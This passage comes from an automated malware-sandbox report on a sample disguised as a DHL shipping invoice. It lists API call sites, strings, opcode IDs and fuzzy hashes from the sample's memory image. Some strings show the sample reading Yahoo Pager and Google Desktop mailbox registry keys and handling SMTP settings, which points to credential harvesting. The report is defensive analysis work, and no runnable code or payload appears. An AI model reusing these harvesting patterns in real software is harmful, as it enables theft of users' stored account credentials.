                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseOpenQueryValuememset
                                                                                                                                                                                                                                      • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                                                                                                      • API String ID: 1830152886-1703613266
                                                                                                                                                                                                                                      • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                                                                                                                                      • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                                                                      • API String ID: 2221118986-2852464175
                                                                                                                                                                                                                                      • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                                                                      • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                                                                                                      • API String ID: 3510742995-3170954634
                                                                                                                                                                                                                                      • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                                                                      • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID: winWrite1$winWrite2
                                                                                                                                                                                                                                      • API String ID: 438689982-3457389245
                                                                                                                                                                                                                                      • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                                                                      • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: winRead
                                                                                                                                                                                                                                      • API String ID: 1297977491-2759563040
                                                                                                                                                                                                                                      • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                                                      • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                                                                                                                                                      • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                                                      • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 004090C2
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4247780290-0
                                                                                                                                                                                                                                      • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                                                      • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                                                                                                                                                        • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                                                                                                                                                        • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2775283111-0
                                                                                                                                                                                                                                      • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                                                                      • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _strcmpi$_mbscpy
                                                                                                                                                                                                                                      • String ID: smtp
                                                                                                                                                                                                                                      • API String ID: 2625860049-60245459
                                                                                                                                                                                                                                      • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                                                                                                                                      • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408258
                                                                                                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$EnumOpenmemset
                                                                                                                                                                                                                                      • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                                                                                                      • API String ID: 2255314230-2212045309
                                                                                                                                                                                                                                      • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                                                                                                                                      • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C28C
                                                                                                                                                                                                                                      • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                                                                                                                                                        • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FocusMessagePostmemset
                                                                                                                                                                                                                                      • String ID: S_@$l
                                                                                                                                                                                                                                      • API String ID: 3436799508-4018740455
                                                                                                                                                                                                                                      • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                                                                                                                                      • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy
                                                                                                                                                                                                                                      • String ID: C^@$X$ini
                                                                                                                                                                                                                                      • API String ID: 714388716-917056472
                                                                                                                                                                                                                                      • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                                                                      • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                                                                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                                                      • String ID: MS Sans Serif
                                                                                                                                                                                                                                      • API String ID: 3492281209-168460110
                                                                                                                                                                                                                                      • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                                                                                                                                      • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassName_strcmpimemset
                                                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                                                      • API String ID: 275601554-2167791130
                                                                                                                                                                                                                                      • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                                                                                                                                      • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strlen$_mbscat
                                                                                                                                                                                                                                      • String ID: 3CD
                                                                                                                                                                                                                                      • API String ID: 3951308622-1938365332
                                                                                                                                                                                                                                      • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                                                                                                                                      • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: rows deleted
                                                                                                                                                                                                                                      • API String ID: 2221118986-571615504
                                                                                                                                                                                                                                      • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                                                                      • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
